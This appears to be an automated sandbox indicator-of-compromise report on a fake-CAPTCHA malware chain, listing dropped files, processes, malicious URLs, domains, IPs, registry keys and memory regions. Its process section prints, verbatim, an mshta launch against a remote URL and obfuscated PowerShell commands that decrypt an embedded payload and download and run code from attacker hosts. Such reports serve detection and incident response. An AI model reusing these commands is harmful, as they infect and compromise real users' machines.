IOC Report

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\winwidgetshp[1].json
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfgw41fq.42d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pziobvie.pow.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2wdiptt.5ji.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1plfcxf.wka.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
"C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D71017DA8A8FE9CCBCC76E3BA3B6A95D1ED2A4A44A168E8636A1C900DADF3286F3ED2FDAD098EE58C7B6AFCCBC68203649484FF462A21AD9EE06F0B2A24495E62A40046DF6C39B77D47A014F0F0940CF765920FB7FA754DFE80F9D4138A2328D4A2F3909905D737350CA18D46A3F34F72969F4026F528EE194317064AC8ABF90F0C562A82D0FB23D49696F85E3A60A4C23E6FC2E69C0C21061968D1E083A7DC8FB925B87086B50A6B6A111CCAA936B945BCCF1B61BA45851312BC53A436D6FD6E88D4E39E965D4CBE982D9E2C56EB4D9900');$wBTv=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ERrXH('6B635876677359704D536E5770724B42')),[byte[]]::new(16)).TransformFinalBlock($ZMcko,0,$ZMcko.Length)); & $wBTv.Substring(0,3) $wBTv.Substring(129)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /C ""C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://solve.fizq.net/awjxs.captcha
172.67.131.114
malicious
https://locketplyxx.click/api
172.67.151.193
malicious
https://atsuka.thrivezest.org/hubus.xlm
172.67.183.27
malicious
https://atsuka.thri
unknown
malicious
https://solve.fizq.net/
unknown
malicious
https://atsuka.thrivezest.org
unknown
malicious
https://atsukaa.thrivezest.org/winwidgetshp.json$
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonLMEMh
unknown
https://solve.fizq.net/awjxs.captchai
unknown
https://solve.fizq.net/awjxs.captchad
unknown
https://github.com/mgravell/protobuf-netJ
unknown
https://atsukaa.thrivezest.org/winwidgetshp.json.
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonetCookiesx
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.jsonhttp
unknown
http://crl.microXz
unknown
https://atsukaa.thrivezest.org/
unknown
https://github.com/mgravell/protobuf-neti
unknown
https://aka.ms/pscore6lB
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsont
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonz
unknown
https://solve.fizq.net/awjxs.captchaDmG
unknown
https://atsukaa.thrivezest.org/winwidgetshp.json
104.21.18.182
https://atsukaMicrosoft.PowerShell.Utility.psd1
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonf
unknown
http://nuget.org/NuGet.exe
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.json
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://solve.fizq.net/awjxs.captcha&
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://solve.fizq.net/awjxs.captcha0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://atsukaa.thrivezest.org/A
unknown
https://solve.fizq.net/awjxs.captcha1
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonstoryHistory.IE5x
unknown
https://solve.fizq.net/awjxs.captcha...
unknown
https://atsukaa.thrivezest.org/winwidgetshp.json...
unknown
https://atsukaa.thrivezest.org/=
unknown
https://contoso.com/Icon
unknown
https://solve.fizq.net/awjxs.captchaWinSta0
unknown
https://github.com/mgravell/protobuf-net
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsoneval(GbaEXk.replace(/(..)./g
unknown
https://atsukaa.thrivezest.org/5
unknown
https://github.com/Pester/Pester
unknown
https://atsukaa.thrivezest.org/winwidgetshp.jsonnC:
unknown
https://solve.fizq.net/awjxs.captchaP
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://atsukaa.thrivezest.org/winwidgetshp.json...#
unknown
https://atsukaa.thrivezest.org/winwidgetshp.json..z
unknown
There are 45 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
atsuka.thrivezest.org
172.67.183.27
malicious
locketplyxx.click
172.67.151.193
malicious
solve.fizq.net
172.67.131.114
malicious
atsukaa.thrivezest.org
104.21.18.182

IPs

IP
Domain
Country
Malicious
172.67.131.114
solve.fizq.net
United States
malicious
172.67.183.27
atsuka.thrivezest.org
United States
malicious
172.67.151.193
locketplyxx.click
United States
malicious
104.21.18.182
atsukaa.thrivezest.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
D3E1000
trusted library allocation
page read and write
malicious
7890000
trusted library section
page read and write
malicious
5F5F000
heap
page read and write
4F3B000
stack
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
78E0000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F0F000
stack
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
A78D000
heap
page read and write
5F71000
heap
page read and write
4D10000
trusted library allocation
page read and write
73BE000
stack
page read and write
AEE9000
trusted library allocation
page read and write
4DEE000
stack
page read and write
5F71000
heap
page read and write
B04F000
trusted library allocation
page read and write
4EB6000
heap
page read and write
5F5F000
heap
page read and write
7BD0000
heap
page execute and read and write
5F48000
heap
page read and write
A3D0000
heap
page read and write
7D90000
trusted library allocation
page read and write
5F75000
heap
page read and write
4A0C000
stack
page read and write
5F71000
heap
page read and write
45F7000
heap
page read and write
A2AA000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F83000
heap
page read and write
5F59000
heap
page read and write
33D6000
heap
page read and write
2798000
heap
page read and write
AEA0000
trusted library allocation
page read and write
A336000
heap
page read and write
5F71000
heap
page read and write
45C4000
heap
page read and write
5F83000
heap
page read and write
8F39000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
5F5F000
heap
page read and write
B0A6000
trusted library allocation
page read and write
5F69000
heap
page read and write
75F7000
heap
page read and write
9484000
trusted library allocation
page read and write
4C35000
trusted library allocation
page execute and read and write
9FE1000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5E0E000
stack
page read and write
5F5A000
heap
page read and write
5F5F000
heap
page read and write
5F5C000
heap
page read and write
5F5F000
heap
page read and write
A34F000
heap
page read and write
A290000
heap
page read and write
282C000
heap
page read and write
6064000
heap
page read and write
7400000
heap
page read and write
5F5C000
heap
page read and write
2740000
trusted library allocation
page read and write
5F5A000
heap
page read and write
A47F000
heap
page read and write
78AD000
stack
page read and write
5F83000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F5F000
heap
page read and write
D6E000
stack
page read and write
8F31000
trusted library allocation
page read and write
A2CB000
heap
page read and write
5F71000
heap
page read and write
608B000
heap
page read and write
34C0000
trusted library allocation
page read and write
60AD000
heap
page read and write
AEE0000
trusted library allocation
page read and write
288D000
heap
page read and write
5F83000
heap
page read and write
5F59000
heap
page read and write
7AC0000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F5A000
heap
page read and write
A34B000
heap
page read and write
5F8A000
heap
page read and write
5F83000
heap
page read and write
B5D4000
heap
page read and write
E3F000
heap
page read and write
A8E5000
heap
page read and write
5F5A000
heap
page read and write
47CE000
trusted library allocation
page read and write
5F83000
heap
page read and write
A31B000
heap
page read and write
5F5A000
heap
page read and write
8960000
trusted library allocation
page read and write
5F75000
heap
page read and write
286D000
heap
page read and write
AD32000
trusted library allocation
page read and write
5F75000
heap
page read and write
608B000
heap
page read and write
AEF3000
trusted library allocation
page read and write
5F83000
heap
page read and write
A333000
heap
page read and write
5F71000
heap
page read and write
6093000
heap
page read and write
5F5A000
heap
page read and write
5F59000
heap
page read and write
5F7D000
heap
page read and write
4C00000
trusted library allocation
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
AEEF000
trusted library allocation
page read and write
5F5A000
heap
page read and write
A5E1000
trusted library allocation
page read and write
A483000
heap
page read and write
5F71000
heap
page read and write
7641000
heap
page read and write
ADF0000
trusted library allocation
page read and write
B0A6000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F71000
heap
page read and write
6076000
heap
page read and write
5F5A000
heap
page read and write
B0A6000
trusted library allocation
page read and write
8490000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
AD32000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
5F84000
heap
page read and write
6066000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F83000
heap
page read and write
4E00000
heap
page read and write
5F5C000
heap
page read and write
7960000
trusted library allocation
page read and write
5F5F000
heap
page read and write
6088000
heap
page read and write
5F83000
heap
page read and write
5F5F000
heap
page read and write
5F20000
heap
page read and write
AE94000
trusted library allocation
page read and write
5F5F000
heap
page read and write
6055000
heap
page read and write
7E10000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
A84F000
heap
page read and write
60F6000
heap
page read and write
604B000
heap
page read and write
5F5A000
heap
page read and write
B0A6000
trusted library allocation
page read and write
5F33000
heap
page read and write
5F7D000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
AEA0000
trusted library allocation
page read and write
A32B000
heap
page read and write
5F5C000
heap
page read and write
A470000
heap
page read and write
47E6000
trusted library allocation
page read and write
5F54000
heap
page read and write
75C7000
heap
page read and write
5F71000
heap
page read and write
6ECE000
stack
page read and write
2880000
heap
page read and write
4838000
trusted library allocation
page read and write
5F75000
heap
page read and write
9524000
trusted library allocation
page read and write
5F83000
heap
page read and write
A312000
heap
page read and write
3089000
heap
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
6399000
trusted library allocation
page read and write
6074000
heap
page read and write
4F6A000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
6094000
heap
page read and write
5F8B000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
5F83000
heap
page read and write
60F1000
heap
page read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
7730000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
4838000
trusted library allocation
page read and write
6E4E000
stack
page read and write
339D000
stack
page read and write
73FE000
stack
page read and write
47A2000
trusted library allocation
page read and write
84A0000
trusted library allocation
page execute and read and write
5F7D000
heap
page read and write
5F59000
heap
page read and write
4838000
trusted library allocation
page read and write
7C10000
trusted library allocation
page read and write
5F84000
heap
page read and write
5DD0000
remote allocation
page read and write
5F5F000
heap
page read and write
5560000
trusted library allocation
page read and write
5F71000
heap
page read and write
3487000
heap
page read and write
5F75000
heap
page read and write
5F10000
heap
page read and write
602F000
heap
page read and write
B5D4000
heap
page read and write
5F5F000
heap
page read and write
4D86000
trusted library allocation
page execute and read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
A783000
heap
page read and write
5F71000
heap
page read and write
8860000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F66000
heap
page read and write
608D000
heap
page read and write
4C60000
heap
page readonly
5F83000
heap
page read and write
5F5A000
heap
page read and write
8F99000
trusted library allocation
page read and write
5F5F000
heap
page read and write
A792000
heap
page read and write
5F59000
heap
page read and write
774C000
stack
page read and write
60A6000
heap
page read and write
45D1000
heap
page read and write
5F75000
heap
page read and write
606B000
heap
page read and write
5F71000
heap
page read and write
84B0000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F59000
heap
page read and write
5F75000
heap
page read and write
6066000
heap
page read and write
608B000
heap
page read and write
E41000
heap
page read and write
5F83000
heap
page read and write
607E000
heap
page read and write
27D0000
heap
page read and write
B0A6000
trusted library allocation
page read and write
34CD000
trusted library allocation
page execute and read and write
5F75000
heap
page read and write
88CD000
stack
page read and write
5E11000
trusted library allocation
page read and write
286D000
heap
page read and write
5F7D000
heap
page read and write
5F83000
heap
page read and write
45E7000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
ACD8000
trusted library allocation
page read and write
5F7D000
heap
page read and write
2792000
heap
page read and write
5F5F000
heap
page read and write
604B000
heap
page read and write
5F7D000
heap
page read and write
4818000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
7950000
trusted library allocation
page read and write
AD3C000
trusted library allocation
page read and write
A713000
heap
page read and write
6F68000
trusted library allocation
page read and write
9473000
trusted library allocation
page read and write
7565000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
A8E5000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F7A000
heap
page read and write
5F5C000
heap
page read and write
5F5F000
heap
page read and write
A2D9000
heap
page read and write
7510000
trusted library allocation
page read and write
5F7D000
heap
page read and write
606B000
heap
page read and write
AEF1000
trusted library allocation
page read and write
873C000
stack
page read and write
5F84000
heap
page read and write
5F59000
heap
page read and write
47E6000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F71000
heap
page read and write
A291000
heap
page read and write
3107000
heap
page read and write
5F5F000
heap
page read and write
509E000
stack
page read and write
5F7D000
heap
page read and write
7505000
heap
page execute and read and write
A7D4000
heap
page read and write
4730000
heap
page read and write
5F71000
heap
page read and write
A35B000
heap
page read and write
75CD000
heap
page read and write
AEE1000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
4C10000
trusted library allocation
page read and write
5DD0000
remote allocation
page read and write
7520000
heap
page execute and read and write
288D000
heap
page read and write
5F5F000
heap
page read and write
4D6C000
stack
page read and write
5F83000
heap
page read and write
D70000
heap
page read and write
5F5C000
heap
page read and write
670000
heap
page read and write
33D0000
heap
page read and write
5F5C000
heap
page read and write
5F75000
heap
page read and write
60DF000
heap
page read and write
2790000
heap
page read and write
AEA0000
trusted library allocation
page read and write
5F75000
heap
page read and write
A6C0000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F80000
heap
page read and write
5F5A000
heap
page read and write
52BE000
stack
page read and write
9471000
trusted library allocation
page read and write
335D000
stack
page read and write
5F83000
heap
page read and write
47A8000
trusted library allocation
page read and write
AEF5000
trusted library allocation
page read and write
45DC000
heap
page read and write
4EFD000
stack
page read and write
5F89000
heap
page read and write
5F75000
heap
page read and write
4B6D000
stack
page read and write
5F75000
heap
page read and write
4800000
trusted library allocation
page read and write
8F25000
trusted library allocation
page read and write
5F7A000
heap
page read and write
6074000
heap
page read and write
5F5F000
heap
page read and write
5F7D000
heap
page read and write
AD05000
trusted library allocation
page read and write
5F5F000
heap
page read and write
A327000
heap
page read and write
5F5F000
heap
page read and write
AD52000
trusted library allocation
page read and write
5F75000
heap
page read and write
A760000
heap
page read and write
607B000
heap
page read and write
60A5000
heap
page read and write
2851000
heap
page read and write
A3CB000
heap
page read and write
5F83000
heap
page read and write
AEEE000
trusted library allocation
page read and write
5F59000
heap
page read and write
6F22000
trusted library allocation
page read and write
E34000
heap
page read and write
5F4E000
heap
page read and write
5F83000
heap
page read and write
7930000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F7D000
heap
page read and write
4E3F000
stack
page read and write
288D000
heap
page read and write
5F59000
heap
page read and write
5F5F000
heap
page read and write
74FE000
stack
page read and write
5F84000
heap
page read and write
4C6D000
stack
page read and write
5F59000
heap
page read and write
A80D000
heap
page read and write
B0A6000
trusted library allocation
page read and write
A3CE000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
4838000
trusted library allocation
page read and write
2887000
heap
page read and write
5F75000
heap
page read and write
5F5A000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F83000
heap
page read and write
33E0000
trusted library allocation
page read and write
5F5F000
heap
page read and write
4C70000
trusted library allocation
page execute and read and write
608B000
heap
page read and write
C9E1000
trusted library allocation
page read and write
606B000
heap
page read and write
5F87000
heap
page read and write
AFF0000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F84000
heap
page read and write
5F75000
heap
page read and write
4818000
trusted library allocation
page read and write
A2E7000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
5F83000
heap
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
4CAE000
stack
page read and write
A338000
heap
page read and write
DB0000
heap
page read and write
3460000
heap
page read and write
288B000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
305E000
stack
page read and write
4DB0000
trusted library allocation
page read and write
AD3C000
trusted library allocation
page read and write
6062000
heap
page read and write
6087000
heap
page read and write
83C0000
heap
page read and write
742E000
stack
page read and write
7770000
trusted library allocation
page read and write
677000
heap
page read and write
A6D3000
heap
page read and write
5F83000
heap
page read and write
606F000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
7D8D000
stack
page read and write
610B000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
75AC000
stack
page read and write
A6A1000
heap
page read and write
5F7D000
heap
page read and write
A689000
heap
page read and write
A7D4000
heap
page read and write
877D000
stack
page read and write
5F79000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
503C000
stack
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
A969000
heap
page read and write
E03000
heap
page read and write
A2ED000
heap
page read and write
6061000
heap
page read and write
604D000
heap
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
279C000
heap
page read and write
704D000
stack
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
34B0000
trusted library allocation
page read and write
A411000
heap
page read and write
45C4000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F83000
heap
page read and write
606F000
heap
page read and write
B0A6000
trusted library allocation
page read and write
AEE9000
trusted library allocation
page read and write
685000
heap
page read and write
5F7D000
heap
page read and write
A46F000
heap
page read and write
5F5A000
heap
page read and write
607E000
heap
page read and write
5F71000
heap
page read and write
52FE000
stack
page read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
5F5F000
heap
page read and write
5F59000
heap
page read and write
DC3000
heap
page read and write
608B000
heap
page read and write
5F5A000
heap
page read and write
75E0000
heap
page read and write
2770000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
30F0000
heap
page read and write
5F71000
heap
page read and write
77F0000
trusted library allocation
page execute and read and write
AD08000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F83000
heap
page read and write
7E40000
trusted library allocation
page read and write
607B000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
7750000
trusted library allocation
page execute and read and write
AD4E000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F5A000
heap
page read and write
5F7D000
heap
page read and write
8969000
trusted library allocation
page read and write
B0A6000
trusted library allocation
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
AE94000
trusted library allocation
page read and write
5F83000
heap
page read and write
27F1000
heap
page read and write
844D000
stack
page read and write
5F83000
heap
page read and write
4758000
trusted library allocation
page read and write
5F75000
heap
page read and write
8830000
heap
page read and write
AFE1000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
A7A1000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
660000
heap
page read and write
5F59000
heap
page read and write
5F5F000
heap
page read and write
9482000
trusted library allocation
page read and write
8AB5000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
7980000
trusted library allocation
page read and write
67C000
heap
page read and write
5F59000
heap
page read and write
7D4E000
stack
page read and write
5F75000
heap
page read and write
608B000
heap
page read and write
45B0000
heap
page read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
288B000
heap
page read and write
5F5C000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
6076000
heap
page read and write
AD3E000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
4D80000
trusted library allocation
page read and write
5F83000
heap
page read and write
5375000
trusted library allocation
page read and write
7DE0000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
708B000
stack
page read and write
606F000
heap
page read and write
A8A4000
heap
page read and write
607B000
heap
page read and write
4818000
trusted library allocation
page read and write
5F75000
heap
page read and write
7600000
trusted library allocation
page read and write
A853000
heap
page read and write
75C3000
heap
page read and write
607E000
heap
page read and write
5F59000
heap
page read and write
DF9000
heap
page read and write
5F5C000
heap
page read and write
5F7D000
heap
page read and write
79C1000
heap
page read and write
5F83000
heap
page read and write
AEEA000
trusted library allocation
page read and write
604B000
heap
